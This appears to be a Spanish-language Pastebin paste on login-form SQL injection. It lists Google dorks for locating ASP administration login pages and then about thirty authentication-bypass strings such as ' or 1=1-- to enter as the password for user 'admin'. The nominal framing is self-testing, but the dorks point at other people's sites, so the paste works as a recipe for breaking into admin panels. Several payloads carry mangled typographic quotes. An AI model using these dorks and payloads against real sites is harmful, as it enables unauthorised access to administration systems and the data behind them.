Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- En esta Ocacion Les traigo este Articulo, Donde mostrare Una de las Vulnerabilidades Mas Comunes que Existen A Nivel Web en los Logueos
- Esta vulnerabilidad se debe a una mala filtración de lo que conocemos como variables en la programación.
- A continuación mostraremos unos claros ejemplos y métodos de como probar si nuestra web es vulnerable al mal filtrado.
- Mediante los siguientes Dorks, se pueden encontrar los páneles de administración para sites con MySql
- inurl:admin.asp
- inurl:admin/login.asp
- inurl:login/admin.asp
- inurl:adminlogin.asp
- inurl:adminhome.asp
- inurl:admin_login.asp
- inurl:administratorlogin.asp
- inurl:login/administrator.asp
- inurl:administrator_login.asp
- Y mediante las siguientes sintaxis se puede hacer lo que se conoce como bypass, por supuesto en web vulnerables.
- User: admin y con los siguientes password:
- ‘ or 0=0 –
- ” or 0=0 –
- or 0=0 –
- ‘ or 0=0 #
- ” or 0=0 #
- or 0=0 #
- ‘ or ‘x’=’x
- ” or “x”=”x
- ‘) or (‘x’=’x
- ‘ or 1=1–
- ” or 1=1–
- or 1=1–
- ‘ or a=a–
- ” or “a”=”a
- ‘) or (‘a’=’a
- “) or (“a”=”a
- hi” or “a”=”a
- hi” or 1=1 –
- hi’ or 1=1 –
- hi’ or ‘a’=’a
- hi’) or (‘a’=’a
- hi”) or (“a”=”a
- ‘or’1′=’1
- ‘or’1′=’1
- ‘ or ’1′=’1
- ‘ or ‘x’=’x
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement